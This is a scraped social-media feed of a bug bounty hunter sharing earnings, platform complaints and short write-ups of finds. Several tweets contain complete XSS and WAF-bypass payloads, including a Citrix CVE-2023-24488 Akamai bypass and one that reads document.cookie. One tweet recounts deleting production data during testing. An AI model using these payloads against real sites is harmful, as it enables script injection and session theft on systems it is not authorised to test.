🇪🇨🍫 Profile
🇪🇨🍫

@bxmbn

Followers
17,208
Following
1
Media
154
Statuses
1,350

against the odds

Ecuador
Joined March 2019
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
@bxmbn
🇪🇨🍫
7 months
This year I Completed 500k in bounties Most rewarded vulnerabilities and the ones I always focused since the beginning: 1. XSS (all types) 2. Cache Poisoning 3. BACs Reached this amount totally from scratch, learning from the internet. No certs. 0 Automation. 0 Collabs.
126
145
2K
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
115
1K
@bxmbn
🇪🇨🍫
8 months
🎃
Tweet media one
Tweet media two
Tweet media three
65
54
1K
@bxmbn
🇪🇨🍫
1 year
Total Earnings by Year 2020 - $850.00 2021 - $19,750.00 2022 - $86,744.50 2023 So Far - $168,034.00 17 y/o me never thought about it, started with 0 Knowledge, curious trying to make money while being at home due to the pandemic, with patience it became my main source of income
Tweet media one
87
117
1K
@bxmbn
🇪🇨🍫
1 year
While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass: post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
Tweet media one
27
281
1K
@bxmbn
🇪🇨🍫
1 year
If you are a beginner in bug bounty I recommend don’t ever buy any courses, nor look for mentors Nothing will guarantee you success in bug bounty I learned and keep learning myself by googling, reading hacktivity reports etc never spent a single dollar to learn Just an advice
42
108
821
@bxmbn
🇪🇨🍫
1 year
Been hunting for almost 3 years now, only focusing in XSS, learned other vuls by just reading never bought courses, don’t use automation tools, not even burp pro and still manage to make a solid monthly income Its not hard, if you see it hard, then it will be hard.
48
74
696
@bxmbn
🇪🇨🍫
9 days
It was worth the wait CVE-2023-35813
Tweet media one
22
28
660
@bxmbn
🇪🇨🍫
11 months
I was rewarded $9.600 bounties 2day and achieved what seemed to be impossible for a long time Top 100 All-Time ✅
Tweet media one
Tweet media two
51
30
642
@bxmbn
🇪🇨🍫
2 months
March's total Bounties: $32,119 5 Broken Access Control: $17,237 4 Reflected XSS = $9,671 2 Cache Deception = $2,789 1 Cache Poisoning - Stored XSS = $1,250 Retests and Bonuses: $1,172
41
27
632
@bxmbn
🇪🇨🍫
1 year
Today's XSS in a Multi-Reflection case: xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
Tweet media one
20
145
622
@bxmbn
🇪🇨🍫
11 months
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅ It’s just art at this point 🎨🖌️
Tweet media one
Tweet media two
Tweet media three
41
105
627
@bxmbn
🇪🇨🍫
10 months
Everything after /? is being reflected ?xss is reflected as Uppercase =xss as Lowercase The app is using Imperva WAF, however that feature allowed me to bypass it using: %3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
Tweet media one
Tweet media two
Tweet media three
21
101
593
@bxmbn
🇪🇨🍫
9 months
My main goal is to get a million bounties and prove to all of you that you can success in Bug Bounty only by: knowing the basics. Not using tools/automation. Thinking like a real black hat.
33
39
570
@bxmbn
🇪🇨🍫
1 year
June was the best one 🫡
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
115
1K
75
38
579
@bxmbn
🇪🇨🍫
11 months
Top bb hunters stay at top because they never share their methodology, and if they do, it is always for a few people, never publicly This is probably one of the reasons why most of them have never even disclosed a single report.
59
38
570
@bxmbn
🇪🇨🍫
11 months
Blocked: <details/open=/Open/href=/data=+ontoggle="(alert)(document.domain) Bypass: <details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
Tweet media one
Tweet media two
20
142
560
@bxmbn
🇪🇨🍫
1 year
This program rewards bounties even on weekends This program’s dedication is the reason why I’m having success
Tweet media one
22
17
484
@bxmbn
🇪🇨🍫
1 month
April's total Bounties: $11,689 5 Reflected XSS = $6,948 3 Broken Access Control: $1,400 1 Cache Deception = $3,000 Retests and Bonuses: $341 Worst bounty month since January of last year ($8,519)
Tweet media one
42
9
484
@bxmbn
🇪🇨🍫
3 months
Stored XSS using Google Reviews 2 If you wonder why I submitted the review like that It was because if I put </script> Google would render as blank (try it) So I submitted another review with another account Containing the rest of the payload so it could work ><svg onload=..
Tweet media one
Tweet media two
14
68
491
@bxmbn
🇪🇨🍫
11 months
Story Time: @Agornello Caesar (turtle_shell) was the one who taught me about Cache Poisoning without even asking for it, after that report my life pretty much changed, I took every advice and took advantage of it This is how important Triagers can be in the life of a researcher
Tweet media one
Tweet media two
Tweet media three
Tweet media four
@Agornello
nadino
1 year
Today was my last day working at @Hacker0x01 ! It has been an incredible journey and I had the pleasure to work with an amazing team. Much kudos to all the triagers out there, it's a hard job and they are real heroes. Also <3 to (most of) the hackers. turtle_shell / caesar
51
3
357
26
40
485
@bxmbn
🇪🇨🍫
8 months
Great start this month 🍁
Tweet media one
Tweet media two
37
19
473
@bxmbn
🇪🇨🍫
6 months
Write ups coming up in 2024: - Accessing 30 Million User’s Orders - How I was able to steal your Insurance Plan - UI:None Cache Poisoning/Deception Cases - Stealing Bank Mail Offers To PII Leak - Akamai Biggest Problem Comment which one you want to see first 🤔
68
31
474
@bxmbn
🇪🇨🍫
11 months
😌
Tweet media one
27
10
462
@bxmbn
🇪🇨🍫
9 months
Its been 3 years since I started bug bounty hunting 600+ resolved reports in ~100 Companies Still so much to learn and so much to earn as well 🫶🏽
Tweet media one
Tweet media two
45
19
456
@bxmbn
🇪🇨🍫
1 year
Tweet media one
26
10
433
@bxmbn
🇪🇨🍫
1 year
Thank you to all cdn providers for inventing caching Special mention to devs who don’t sanitize headers and cookies either 🫡
Tweet media one
26
39
429
@bxmbn
🇪🇨🍫
11 months
magicId=00192729301 Set-Cookie: SessionId=<sessionId.00192729301> magicId=00192729302 Set-Cookie: SessionId=<sessionId.00192729302> 2023 and we still have these types of bugs lol By the way, this is P1 In my books 🤓👆🏽
Tweet media one
19
51
426
@bxmbn
🇪🇨🍫
1 year
Will June be a good one too? 📝✍🏽 I just need more private invites 🤞🏽
Tweet media one
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
115
1K
29
19
415
@bxmbn
🇪🇨🍫
1 year
Updated my H1 Profile 🫡
Tweet media one
34
18
407
@bxmbn
🇪🇨🍫
10 months
Each parameter reflects as Event Attributes in each Input tag, but each parameter is limited to 10 characters Being limited to 10 characters was a good thing because it also allowed me to bypass the WAF 🤓 VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus
Tweet media one
Tweet media two
13
72
414
@bxmbn
🇪🇨🍫
1 year
Critical Bounty today to finally reach the 10,000 Rep Milestone It’s crazy that few days ago I was at 8,384 Rep🔝
Tweet media one
Tweet media two
Tweet media three
27
6
394
@bxmbn
🇪🇨🍫
10 months
Request header is easy to find as it’s a response header that reflects in all pages, they also have a public program, affects main domain, and a lot of hackers who know this attack in the leaderboard, maybe this can confirm I have the best WAF bypass 😌
Tweet media one
17
31
386
@bxmbn
🇪🇨🍫
8 months
2024
Tweet media one
Tweet media two
15
22
384
@bxmbn
🇪🇨🍫
1 year
My tweets were able to get me an invite 🙏🏽 I might be able to continue at the top 🤞🏽
Tweet media one
12
12
371
@bxmbn
🇪🇨🍫
1 month
We all agree Bug Bounty is: 50% Luck 50% Skill ?
66
14
381
@bxmbn
🇪🇨🍫
1 year
You see the results but behind this, there were a lot of NAs, duplicates, Informatives, especially when I first started, months of not finding anything The difference is that I never quit 💪🏽
@bxmbn
🇪🇨🍫
1 year
May was a good one 🫶🏽
Tweet media one
Tweet media two
89
115
1K
27
30
371
@bxmbn
🇪🇨🍫
9 months
😼
Tweet media one
Tweet media two
32
13
361
@bxmbn
🇪🇨🍫
8 months
High 8.9 = $2,000 Critical = $5,000 😔👍🏽
Tweet media one
11
15
344
@bxmbn
🇪🇨🍫
11 months
💰✅
Tweet media one
@bxmbn
🇪🇨🍫
11 months
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅ It’s just art at this point 🎨🖌️
Tweet media one
Tweet media two
Tweet media three
41
105
627
23
28
353
@bxmbn
🇪🇨🍫
6 months
There are some changes guys 😝 • I cannot do the Akamai one yet, but sometime in 2024 I should have the green light • There was actually a mistake, It’s 3 Million not 30, Still a mass data breach due to the sensitive info exposed Will publish 2 blogs in January 5th
Tweet media one
@bxmbn
🇪🇨🍫
6 months
Write ups coming up in 2024: - Accessing 30 Million User’s Orders - How I was able to steal your Insurance Plan - UI:None Cache Poisoning/Deception Cases - Stealing Bank Mail Offers To PII Leak - Akamai Biggest Problem Comment which one you want to see first 🤔
68
31
474
10
26
349
@bxmbn
🇪🇨🍫
5 months
Goals for the new year? None. I had none last year and it was my most successful year in every aspect to date that my old self wouldn’t even believe it If you set goals, you are limiting yourself, you could do more than anything you set today Happy New Year!
13
15
318
@bxmbn
🇪🇨🍫
8 months
Got some delayed bounties In September T-Mobile BBP Robbed me like 15k fixing crits and not paying but all good 😝
Tweet media one
Tweet media two
Tweet media three
Tweet media four
14
15
313
@bxmbn
🇪🇨🍫
8 months
Hackerone vs Bugcrowd Programs with higher bounties Winner: Bugcrowd Exclusive programs (Top Companies) Winner: H1 Support Winner: Bugcrowd Triagers (communication, knowledge and response times) Winner: H1 (by a lot)
16
20
309
@bxmbn
🇪🇨🍫
10 months
August ☀️
Tweet media one
Tweet media two
Tweet media three
25
14
290
@bxmbn
🇪🇨🍫
1 month
Tweet media one
Tweet media two
18
17
289
@bxmbn
🇪🇨🍫
1 year
Waking up and seeing this I call this passive income 🤓👆🏽
Tweet media one
25
10
276
@bxmbn
🇪🇨🍫
3 months
Today, I learned that if there is a bypass I should not name the title of the report “Bypass of …” anymore
Tweet media one
9
13
272
@bxmbn
🇪🇨🍫
1 year
I have probably the best Akamai XSS bypass until date It works everytime, I could share it but if i do, Akamai will fix it Devs should sanitize their inputs so that they dont rely on WAF, plus I make more money 😼🤝🏼😼
27
7
251
@bxmbn
🇪🇨🍫
2 months
Tweet media one
14
8
260
@bxmbn
🇪🇨🍫
1 year
Will disconnect for a while🫡 Finished sending my last reports, Hopefully they get all triaged so they can cover all my expenses for the following days 🛫🏝️
Tweet media one
Tweet media two
21
2
252
@bxmbn
🇪🇨🍫
9 months
Scope Updates and Private Invites = 💰
Tweet media one
Tweet media two
Tweet media three
Tweet media four
13
11
257
@bxmbn
🇪🇨🍫
2 months
My reaction when my hardest xss bypass gets closed as an ‘internal’ duplicate
Tweet media one
18
9
249
@bxmbn
🇪🇨🍫
9 months
Found a vulnerable request that always loads when navigating through the app The cache duration is great I just need to wait until it expires and poison it with XSS to achieve ZERO UI Stored XSS And the best part of it: Big company + I use their services
Tweet media one
7
14
240
@bxmbn
🇪🇨🍫
5 months
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
Tweet media one
15
11
237
@bxmbn
🇪🇨🍫
1 month
Me after reporting a Critical CVE and getting rewarded a Critical Bounty
Tweet media one
5
7
238
@bxmbn
🇪🇨🍫
9 months
Finally man!! last time I got multiple invitations was literally a year ago Time to make more bounties before the year ends 🙏🏽
Tweet media one
11
6
225
@bxmbn
🇪🇨🍫
5 months
Gotta keep your eyes open ✅
Tweet media one
@bxmbn
🇪🇨🍫
5 months
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
Tweet media one
15
11
237
12
9
223
@bxmbn
🇪🇨🍫
2 months
More and more BBPs programs leaving/closing at a crazy rate New VDPs every month Almost 300 Reports in less than a week for this new VDP We are doomed.
Tweet media one
Tweet media two
35
16
225
@bxmbn
🇪🇨🍫
1 year
I’m making more than the average and most professions Getting into Bug bounty was the best decision I took even though I tried to quit at somepoint because I was not seeing results, Life its about decisions Great things never come easy Top 100 All time Soon
Tweet media one
Tweet media two
21
9
218
@bxmbn
🇪🇨🍫
7 months
Cache Poisoning XSS that does not require a file extension to cache and affects multiple pages should be treated as Critical It’s insane that still to this day and after reporting them multiple times, the severity is treated as it was a normal limited stored XSS
6
11
214
@bxmbn
🇪🇨🍫
3 months
Some of the reasons why VDPs still exist today: *VDP-only hackers this year so far*
Tweet media one
Tweet media two
25
8
215
@bxmbn
🇪🇨🍫
7 months
Got a bank offer to my mail, and found a very nice IDOR
Tweet media one
Tweet media two
6
6
215
@bxmbn
🇪🇨🍫
1 year
In 14 days I will be disclosing two reports Can't wait for you to see these, especially the XSS one, it was a pretty clever find!
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
9
211
@bxmbn
🇪🇨🍫
4 months
3 Months ago, I bought stocks from a company using some of the bounties I earned with them and the company it’s up more than 40% now
Tweet media one
13
3
208
@bxmbn
🇪🇨🍫
9 months
don’t report bugs to vdps, especially those who are multi-millionare companies this way we can force them to open bbps 😝
9
14
204
@bxmbn
🇪🇨🍫
3 months
Proud to have a 740 credit score and 100k available credit at 20 years old in just 2 years of credit 🔐
13
4
203
@bxmbn
🇪🇨🍫
7 months
At least they rewarded the bounty before banning me It was a good program after all made 110k in this program alone But they disappointed me with their decision
Tweet media one
@bxmbn
🇪🇨🍫
7 months
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
170
11
6
201
@bxmbn
🇪🇨🍫
2 months
Me when VDP points get removed from all platforms and seeing all VDP Hackers go down to 0 points:
20
7
203
@bxmbn
🇪🇨🍫
2 months
Tweet media one
Tweet media two
Tweet media three
Tweet media four
20
23
203
@bxmbn
🇪🇨🍫
11 months
Today was also retesting day in H1👌🏽
Tweet media one
Tweet media two
Tweet media three
5
3
202
@bxmbn
🇪🇨🍫
1 year
For anyone wondering more than half of my earnings are just XSS vulnerabilities. Q2 2022 is when I learned about Cache Poisoning This is why you see the increase on bounties since I found multiple Stored XSS via Cache Poisoning and stuck with it afterwards.
Tweet media one
3
3
191
@bxmbn
🇪🇨🍫
11 months
Best Triagers in Hackerone Caesar Carlos Alexander Juan Moe Decimo
20
10
194
@bxmbn
🇪🇨🍫
2 months
Average life of BBP-Only Hunters
12
6
192
@bxmbn
🇪🇨🍫
1 year
Most of my generation will be graduating by 25 and they might have saved a bit of money Me at 20 I’m on my way to retire at 25 📈 🤞🏽
10
12
184
@bxmbn
🇪🇨🍫
7 months
I noticed that you get private invitations based on what you search on google I was looking at for cars at 1am today and got a private Invite from a Car company at 4 am I was able to confirm this since I saw the same behavior on the other platform I hunt already.
19
4
188
@bxmbn
🇪🇨🍫
2 months
@mouka0x Hashtag in this post: #BugBounty 💰 Your Bounties: $0,0000 😔 AON VDP: Thank you so much, I don’t need to open a BBP anymore 😊🥰
13
1
187
@bxmbn
🇪🇨🍫
3 months
People that hunt on vdps is what keep them alive We can all force them to open BBP’s only if nobody hunts on VDPs
@SchizoDuckie
🦆 SchizoDuckie 🦆
3 months
Presented without further comment.
Tweet media one
Tweet media two
Tweet media three
10
3
91
16
18
186
@bxmbn
🇪🇨🍫
11 months
Feels good when you receive an program invite and you use their services already So far: 1 critical 1 High 7 Mediums This always lets you have a huge advantage, especially on a program with limited scope, since others hackers need to go to the process of creating an account
7
5
181
@bxmbn
🇪🇨🍫
8 months
Stored XSS ≠ Oauth Misconfiguration 🤓👆🏽
Tweet media one
Tweet media two
2
10
180
@bxmbn
🇪🇨🍫
10 months
DM's are Open If you need help on anything Just dm :)
15
2
173
@bxmbn
🇪🇨🍫
1 year
You have to love NOT finding bugs in order to success in bug bounty.
12
9
173
@bxmbn
🇪🇨🍫
9 months
Always wondered why Chinese companies offer such low bounties
Tweet media one
Tweet media two
21
12
175
@bxmbn
🇪🇨🍫
11 months
Found an XSS endpoint where the server creates files without sanitation you can create a file then share it to anyone, you can also edit user’s files to save XSS on it using the uniqueId which is vulnerable to IDOR Whats Your CVSS Score?
18
8
177
@bxmbn
🇪🇨🍫
7 months
😸
Tweet media one
@bxmbn
🇪🇨🍫
7 months
Privileges Required: Low
Tweet media one
Tweet media two
2
0
33
8
2
172
@bxmbn
🇪🇨🍫
3 months
Programs leaving at this rate is crazy 🧐
Tweet media one
Tweet media two
21
2
175
@bxmbn
🇪🇨🍫
11 months
I finally got it🫡
Tweet media one
9
3
172
@bxmbn
🇪🇨🍫
7 months
This program is just unbelievable, they have Mass PII leak as Critical, I reported mass PII Leak and they only rewarded as High. They didn’t follow their own policy, nor explained why. But then I found an RXSS and they did followed their policy this time and rewarded as Low 🙂
Tweet media one
Tweet media two
Tweet media three
Tweet media four
8
9
172
@bxmbn
🇪🇨🍫
1 year
Hackerone should pay me for indirectly promoting them 😂 Like everytime I tweet about my bounties new people ask me how to start I will be happy only with more private invites tho @Hacker0x01 👀
13
6
167
@bxmbn
🇪🇨🍫
7 months
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
170
@bxmbn
🇪🇨🍫
1 year
Biggest tip I can give you Dont get mad or sad of others success If you get mad as a result of others people’s success you are not going no where, you are lost.. Instead take as a challenge. you will overcome yourself and will help you in anything in life
7
13
165
@bxmbn
🇪🇨🍫
8 months
I’m by myself in a program with 446 rep points and a total of 32,900 in bounties paid Top bounty:5k While I’m also in another program where there is only 1 hacker that has earned 20,000 in bounties but WITH 444 rep points Top Bounty: 3k Rep system is broken in H1 😭
7
5
168
@bxmbn
🇪🇨🍫
1 year
1 year as a H1 Clear Member I have seen few to zero benefits from what they state you will get as a H1 Clear member....
Tweet media one
Tweet media two
7
2
163
@bxmbn
🇪🇨🍫
3 months
I never attacked anyone, If you can make these amounts of points in vdps you have the ability to do the same in a bbp thats all They said it’s not of my business, but if more companies see they can still get good-impactful-quality reports without having to reward, we’re fucked.
@bxmbn
🇪🇨🍫
3 months
Some of the reasons why VDPs still exist today: *VDP-only hackers this year so far*
Tweet media one
Tweet media two
25
8
215
14
8
162
@bxmbn
🇪🇨🍫
1 year
I just read about the cache deception in chatgpt You have no idea how common cache deception is Devs should know that if your app is behind Cloudflare you SHOULD have Cache Deception Armor Enabled I helped Cloudflare finding a bypass for it
7
20
159
@bxmbn
🇪🇨🍫
3 months
I stopped in OCT because I thought it was not that important anymore and my biggest issue was that I didn’t want platforms to benefit from it. I could’ve hide their names but I just decided to stop but here they are again: NOV bounties were: $39,312 Bounties from DEC to FEB:
Tweet media one
@amans_3456
Aman Sharma
3 months
@bxmbn @scarybeasts hello @bxmbn why you don't post your monthly bounties screenshot...which you were posting few months before
0
0
2
16
6
160
@bxmbn
🇪🇨🍫
2 months
VDP-Only Hunters when they find out their points are getting removed
18
9
156
@bxmbn
🇪🇨🍫
9 months
After two years H1 revoked my Clear Status due to an unfair “unsafe testing” penalty, I feel like this penalty is too much giving that it was my first ever warning since I got it, and part of the issue was the program’s fault for not providing test creds 💔
Tweet media one
11
0
153
@bxmbn
🇪🇨🍫
7 months
Triagers I trust👆🏽🤓: Carlos Alexander Vanessa Layla Lucas Enzo Ivan Wilson Tal
17
1
146